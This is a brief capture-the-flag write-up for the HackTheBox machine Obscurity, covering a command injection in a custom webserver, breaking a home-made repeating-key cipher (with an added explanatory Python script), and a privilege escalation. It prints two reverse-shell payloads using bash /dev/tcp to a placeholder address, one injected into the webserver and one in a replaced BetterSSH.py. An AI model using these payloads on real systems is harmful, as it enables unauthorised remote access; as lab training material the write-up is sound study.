Obscurity @ HackTheBox

Obscurity is a 30-point Linux machine on HackTheBox that involves exploiting a command injection in a custom webserver, breaking a simple cipher and abusing file system permissions to get root.

Notes

Command injection payload:

```
';__import__("os").system("bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'")+'
```

Retrieving the key:

```bash
python3 SuperSecureCrypt.py -d -i out.txt -k "`cat check.txt`" -o key
```

Decrypting the ssh password:

```bash
python3 SuperSecureCrypt.py -d -i passwordreminder.txt -k alexandrovich -o /dev/shm/x
```
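
Why the key retrieval and the follow-up decryption work, as an added example (not from the original post and not the machine's SuperSecureCrypt.py): assuming the script is a repeating-key additive cipher, "decrypting" the ciphertext with the known plaintext as the key leaves the key repeated. The modulus 255, the function names and the sample texts are assumptions constructed for illustration; only the key `alexandrovich` comes from the notes above.

```python
MOD = 255  # assumed modulus for this toy model of the cipher

KEY = "alexandrovich"  # key value taken from the notes above
# Constructed sample standing in for check.txt (known plaintext).
CHECK = "Constructed known plaintext standing in for check.txt, longer than the key."


def encrypt(text: str, key: str) -> str:
    """c[i] = (p[i] + k[i mod len(k)]) mod MOD"""
    return "".join(chr((ord(p) + ord(key[i % len(key)])) % MOD)
                   for i, p in enumerate(text))


def decrypt(text: str, key: str) -> str:
    """p[i] = (c[i] - k[i mod len(k)]) mod MOD"""
    return "".join(chr((ord(c) - ord(key[i % len(key)])) % MOD)
                   for i, c in enumerate(text))


def shortest_period(stream: str) -> str:
    """Return the shortest prefix that, repeated, reproduces the stream."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


def recover_key(known_plaintext: str, ciphertext: str) -> str:
    # c - p = k (mod MOD): using the plaintext as the "key" for decryption
    # yields the key stream, i.e. the real key repeated over the message.
    keystream = decrypt(ciphertext, known_plaintext)
    return shortest_period(keystream)


if __name__ == "__main__":
    out = encrypt(CHECK, KEY)                        # stands in for out.txt
    key = recover_key(CHECK, out)
    reminder = encrypt("constructed-password", KEY)  # stands in for passwordreminder.txt
    print("recovered key:", key)
    print("decrypted reminder:", decrypt(reminder, key))
```

One known plaintext/ciphertext pair is enough to recover the key, and every other file encrypted under it falls with it, which is the design flaw that a vetted authenticated cipher would avoid.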

Replaced BetterSSH.py:

```python
import os
os.system("bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'")
```

This post is licensed under CC BY 4.0 by the author.